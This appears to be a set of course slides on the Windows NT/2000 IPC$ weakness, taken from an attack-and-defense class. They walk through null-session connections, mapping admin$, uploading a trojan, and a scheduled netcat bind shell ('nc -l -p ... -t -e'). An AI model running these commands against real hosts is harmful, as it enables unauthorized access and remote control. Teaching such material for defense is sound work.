《网络攻击与防御》专题课件1IPC$漏洞.ppt

广州科技职业技术学院黄伟
IPC$漏洞
什么是IPC$?
在win NT/2000环境下, IPC$(Inter-munication),它是为了让进程间网络通信而开放的主机间的连接。通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
IPC$的特点
两台主机间任何时候只允许有一个IPC$连接。
Windows Server 2003上使用139端口。
连接时需提供用户名跟密码。
允许空连接,即用户名和密码为空。
致命漏洞
IPC$连接建立后,被连接的主机没有把对方的活动限制在进程间通信范围内,而是允许对方越权访问非IPC$的共享资源。
战云:攻击准备
宝贝你好吗:空连接
net use \\< IP >\ipc$ “”/user:“”
窃听:使用嗅探工具,如sniffer pro
偷窥:使用扫描工具,如X-Scan
斗智:使用密码猜测工具,如流光
若攻击机是Win7,服务。
闪击:连接
咒语:建立ipc$连接
net use \\<IP>\ipc$ “<密码>”/user:“<用户名>”
越界:映射对方机器其他共享(例如admin$)到本机(例如Z盘)
net use z: \\<IP>\admin$
闪击:连接
瑞士军刀:上传木马程序


闪击:连接
定时炸弹:向对方机器添加定时任务,, 并把界面输出到指定端口。
net time \\<IP> 【得到对方时间】
at \\<IP> <指定时间> nc -l -p <端口号> -t -e  【使对方在<指定时间>启动DOS窗口,并输出到对方的<端口号>端口。】
闪击:连接
地狱之门:登录到定时炸弹炸开的端口得到一个shell(命令窗口)
<IP> <端口号>
不要高兴得太早:权限不够
渗透:提权
漏洞之后的漏洞
NT核心进程WinLogon可被非法使用, 用来把任何用户加入管理员组。

王牌出场:运行提权程序
,,。